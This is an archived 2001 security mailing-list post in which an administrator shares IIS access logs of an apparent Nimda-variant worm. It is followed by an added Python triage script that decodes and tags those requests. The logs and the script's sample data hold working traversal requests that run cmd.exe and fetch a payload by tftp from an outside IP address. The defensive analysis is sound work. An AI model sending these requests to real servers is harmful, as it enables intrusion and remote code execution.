New Worm Variant?

From: Aj Effin Reznor (ajat_private)
Date: Mon Oct 29 2001 - 23:19:32 PST


    Anyone seen a new worm doing something like this?
    
    Checking back through my logs, I haven't had a NIMDA instance yet looking
    for httpodbc.dll.  Caught my eye.  Anyone else?  (Yes, some produce a
    code 200 rather than 404, that's to be expected on this system).
    
    Log times are in PST
    
    [29/Oct/2001:17:08:22 -0800] "GET /scripts/root.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438 "-" "-"
    [29/Oct/2001:17:08:35 -0800] "GET /scripts/httpodbc.dll HTTP/1.0" 404 332 "-" "-"
    [29/Oct/2001:17:08:44 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 384 "-" "-"
    [29/Oct/2001:17:08:52 -0800] "GET /MSADC/root.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 436 "-" "-"
    [29/Oct/2001:17:08:53 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330 "-" "-"
    [29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 394 "-" "-"
    [29/Oct/2001:17:09:11 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
    [29/Oct/2001:17:09:21 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
    [29/Oct/2001:17:09:30 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
    [29/Oct/2001:17:09:30 -0800] "GET /c/httpodbc.dll HTTP/1.0" 404 326 "-" "-"
    [29/Oct/2001:17:09:40 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 394 "-" "-"
    [29/Oct/2001:17:09:52 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
    [29/Oct/2001:17:10:01 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
    [29/Oct/2001:17:10:11 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
    [29/Oct/2001:17:10:11 -0800] "GET /d/httpodbc.dll HTTP/1.0" 404 326 "-" "-"
    [29/Oct/2001:17:10:20 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 410 "-" "-"
    [29/Oct/2001:17:10:30 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
    [29/Oct/2001:17:10:38 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
    [29/Oct/2001:17:10:47 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
    [29/Oct/2001:17:10:55 -0800] "GET /scripts/..%255c../httpodbc.dll HTTP/1.0" 200 393 "-" "-"
    [29/Oct/2001:17:11:03 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 431 "-" "-"
    [29/Oct/2001:17:11:12 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
    [29/Oct/2001:17:11:21 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
    [29/Oct/2001:17:11:30 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
    [29/Oct/2001:17:11:39 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0" 200 414 "-" "-"
    [29/Oct/2001:17:11:48 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 431 "-" "-"
    [29/Oct/2001:17:11:57 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
    [29/Oct/2001:17:12:06 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
    [29/Oct/2001:17:12:15 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
    [29/Oct/2001:17:12:24 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0" 200 414 "-" "-"
    [29/Oct/2001:17:12:33 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 459 "-" "-"
    [29/Oct/2001:17:12:43 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 514 "-" "-"
    [29/Oct/2001:17:12:55 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 514 "-" "-"
    [29/Oct/2001:17:13:04 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 514 "-" "-"
    [29/Oct/2001:17:13:13 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../httpodbc.dll HTTP/1.0" 200 442 "-" "-"
    [29/Oct/2001:17:13:24 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
    [29/Oct/2001:17:13:33 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:13:42 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:13:51 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:14:00 -0800] "GET /scripts/..%c1%1c../httpodbc.dll HTTP/1.0" 200 394 "-" "-"
    [29/Oct/2001:17:14:00 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
    [29/Oct/2001:17:14:10 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
    [29/Oct/2001:17:14:19 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:14:28 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:14:37 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:14:45 -0800] "GET /scripts/..%c0%af../httpodbc.dll HTTP/1.0" 200 394 "-" "-"
    [29/Oct/2001:17:14:53 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
    [29/Oct/2001:17:15:07 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:15:19 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:15:28 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:15:37 -0800] "GET /scripts/..%c1%9c../httpodbc.dll HTTP/1.0" 200 394 "-" "-"
    [29/Oct/2001:17:15:37 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
    [29/Oct/2001:17:15:38 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
    [29/Oct/2001:17:15:50 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 414 "-" "-"
    [29/Oct/2001:17:15:59 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 469 "-" "-"
    [29/Oct/2001:17:16:08 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 469 "-" "-"
    [29/Oct/2001:17:16:17 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 469 "-" "-"
    [29/Oct/2001:17:16:26 -0800] "GET /scripts/..%25%35%63../httpodbc.dll HTTP/1.0" 200 397 "-" "-"
    [29/Oct/2001:17:16:37 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 410 "-" "-"
    [29/Oct/2001:17:16:46 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
    [29/Oct/2001:17:16:55 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
    [29/Oct/2001:17:17:04 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
    [29/Oct/2001:17:17:13 -0800] "GET /scripts/..%252f../httpodbc.dll HTTP/1.0" 200 393 "-" "-"
    
    
    
    -aj.
    
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
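Added here as a worked example, not code from the post or from any worm analysis: a small triage script that decodes request paths the way IIS 4/5 resolved them and tags what each line in the log above is trying to do. The overlong-UTF-8 table, the two-pass URL decode and the tag names are this script's own approximation of the server behaviour, not something the post states; the eight sample lines are quoted from the post (63.81.8.131 is the tftp source that appears there), and the script assumes the trimmed `[time] "request" status bytes` layout the poster used.

```python
"""Triage of IIS traversal / tftp-fetch log lines like those in the post.
Added example, not code from the post. Decoding approximates two IIS 4/5
behaviours these URIs abuse: overlong UTF-8 forms of '/' and '\\' taken as
separators (MS00-078) and a second URL-decode pass after the '..' check (MS01-026).
"""
import re
from collections import Counter
from typing import Optional
from urllib.parse import unquote

# Overlong forms IIS turned into separators (assumed table). %c0%2f is not a valid
# overlong form (2nd byte must be 0x80-0xbf), so it stays as-is; it drew a 404 above.
OVERLONG = {"%c0%af": "/", "%c1%9c": "\\", "%c1%1c": "\\"}

LOG_RE = re.compile(
    r'\[(?P<ts>[^\]]+)\]\s+"(?P<method>\S+)\s+(?P<uri>\S+)\s+[^"]+"\s+'
    r"(?P<status>\d{3})\s+(?P<bytes>\d+|-)")
TFTP_RE = re.compile(
    r"tftp\s+(?:-i\s+)?(?P<host>\d{1,3}(?:\.\d{1,3}){3})\s+GET\s+(?P<remote>\S+)"
    r"(?:\s+(?P<local>\S+))?", re.IGNORECASE)

# Eight lines quoted from the post (request field verbatim, times are -0800).
SAMPLE_LINES = r'''
[29/Oct/2001:17:08:22 -0800] "GET /scripts/root.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438 "-" "-"
[29/Oct/2001:17:08:35 -0800] "GET /scripts/httpodbc.dll HTTP/1.0" 404 332 "-" "-"
[29/Oct/2001:17:10:20 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 410 "-" "-"
[29/Oct/2001:17:12:33 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 459 "-" "-"
[29/Oct/2001:17:14:00 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
[29/Oct/2001:17:14:10 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
[29/Oct/2001:17:15:37 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
[29/Oct/2001:17:16:46 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
'''.strip().splitlines()

def decode_like_iis(path: str) -> str:
    """Overlong UTF-8 -> separator, two URL-decode passes (%255c -> %5c -> \\), then '\\' -> '/'."""
    s = path
    for enc, sep in OVERLONG.items():
        s = re.sub(re.escape(enc), lambda _m, sep=sep: sep, s, flags=re.IGNORECASE)
    for _ in range(2):
        s = unquote(s)
    return s.replace("\\", "/")

def escapes_webroot(decoded: str) -> bool:
    """True when '..' climbs above the vdir; /c/winnt/... (a vdir mapped to a drive) is not traversal."""
    depth = 0
    for seg in decoded.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def parse_command(uri: str) -> Optional[str]:
    """Recover the shell command passed as ?/c+... to cmd.exe or root.exe."""
    if "?" not in uri:
        return None
    cmd = unquote(uri.split("?", 1)[1].replace("+", " ")).strip()
    return cmd[3:].strip() if cmd.lower().startswith("/c ") else cmd

def triage(line: str) -> Optional[dict]:
    """Tag what the request attempts (tag names are this script's own); the status column says whether the server went along."""
    m = LOG_RE.search(line)
    if not m:
        return None
    uri = m["uri"]
    path = uri.partition("?")[0]
    low = path.lower()
    decoded = decode_like_iis(path)
    exe = decoded.rsplit("/", 1)[-1].lower()
    cmd = parse_command(uri)
    checks = {"double-encoding": "%25" in low or "%%" in low,
              "overlong-utf8": any(e in low for e in OVERLONG),
              "traversal": escapes_webroot(decoded),
              exe: exe in ("cmd.exe", "root.exe"),
              "dropped-file-probe": exe == "httpodbc.dll"}   # did the drop land?
    tags = {k for k, v in checks.items() if v}
    tftp = None
    if cmd and (t := TFTP_RE.search(cmd)):
        tags.add("tftp-fetch")
        tftp = {"host": t["host"], "remote": t["remote"], "local": t["local"] or t["remote"]}
    return {"ts": m["ts"], "status": int(m["status"]), "path": path, "decoded": decoded,
            "exe": exe, "command": cmd, "tftp": tftp, "tags": sorted(tags)}

def summarize(lines) -> dict:
    """Where the payload is fetched from, what it is written as, and how many command requests got a 200."""
    hits = [h for h in map(triage, lines) if h]
    fetches = [h["tftp"] for h in hits if h["tftp"]]
    return {"tftp_sources": dict(Counter(f["host"] for f in fetches)),
            "drop_targets": dict(Counter(f["local"] for f in fetches)),
            "cmd_200": sum(h["status"] == 200 and h["exe"] in ("cmd.exe", "root.exe")
                           for h in hits)}

if __name__ == "__main__":
    print(*map(triage, SAMPLE_LINES), summarize(SAMPLE_LINES), sep="\n")
```

Running it over the quoted lines gives one tftp source (63.81.8.131) and two drop names (`httpodbc.dll` relative to the vdir, and `c:\httpodbc.dll`), which is what the follow-up `GET .../httpodbc.dll` probes are checking for. Note that the decoder is deliberately generous: the `%%35%63` variant decodes to a traversal here even though the post shows IIS answering it with a 400, and a 200 on a `cmd.exe?/c+dir` request only tells you what the server returned, not that the command ran, which is exactly the caveat the poster attaches to his own 200s.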
    



    This archive was generated by hypermail 2b30 : Tue Oct 30 2001 - 06:44:34 PST